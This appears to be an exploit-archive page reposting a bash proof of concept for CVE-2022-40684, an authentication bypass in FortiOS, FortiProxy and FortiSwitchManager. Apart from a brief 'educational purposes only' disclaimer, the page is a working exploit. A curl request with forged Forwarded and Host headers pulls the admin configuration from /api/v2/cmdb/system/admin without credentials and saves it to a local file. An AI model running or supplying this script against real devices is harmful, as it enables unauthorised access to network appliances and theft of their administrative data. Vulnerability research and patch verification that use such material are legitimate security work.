Fortios, fortiproxy, fortiswitchmanager v7.2.1 authentication bypass Vulnerability / Exploit

  /     /     /  

Exploits / Vulnerability Discovered : 2023-03-27 | Type : webapps | Platform : multiple
This exploit / vulnerability Fortios, fortiproxy, fortiswitchmanager v7.2.1 authentication bypass is for educational purposes only and if it is used you will do on your own risk!

---

[+] Code ...

# Exploit Title: Fortinet Authentication Bypass v7.2.1 - (FortiOS, FortiProxy, FortiSwitchManager)
# Date: 13/10/2022
# Exploit Author: Felipe Alcantara (Filiplain)
# Vendor Homepage: https://www.fortinet.com/
# Version:
#FortiOS from 7.2.0 to 7.2.1
#FortiOS from 7.0.0 to 7.0.6
#FortiProxy 7.2.0
#FortiProxy from 7.0.0 to 7.0.6
#FortiSwitchManager 7.2.0
#FortiSwitchManager 7.0.0
# Tested on: Kali Linux
# CVE : CVE-2022-40684

# https://github.com/Filiplain/Fortinet-PoC-Auth-Bypass

# Usage: ./poc.sh <ip> <port>
# Example: ./poc.sh 10.10.10.120 8443

#!/bin/bash

red="\e[0;31m\033[1m"
blue="\e[0;34m\033[1m"
yellow="\e[0;33m\033[1m"
end="\033[0m\e[0m"

target=$1
port=$2

vuln () {

echo -e "${yellow}[+] Dumping System Information: ${end}"

timeout 10 curl -s -k -X $'GET' \
-H $'Host: 127.0.0.1:9980' -H $'User-Agent: Node.js' -H $'Accept-Encoding\": gzip, deflate' -H $'Forwarded: by=\"[127.0.0.1]:80\";for=\"[127.0.0.1]:49490\";proto=http;host=' -H $'X-Forwarded-Vdom: root' -H $'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9' "https://$target:$port/api/v2/cmdb/system/admin" > $target.out
if [ "$?" == "0" ];then
grep "results" ./$target.out >/dev/null
if [ "$?" == "0" ];then
echo -e "${blue}Vulnerable: Saved to file $PWD/$target.out ${end}"
else
rm -f ./$target.out
echo -e "${red}Not Vulnerable ${end}"
fi

else

echo -e "${red}Not Vulnerable ${end}"
rm -f ./$target.out

fi


}

vuln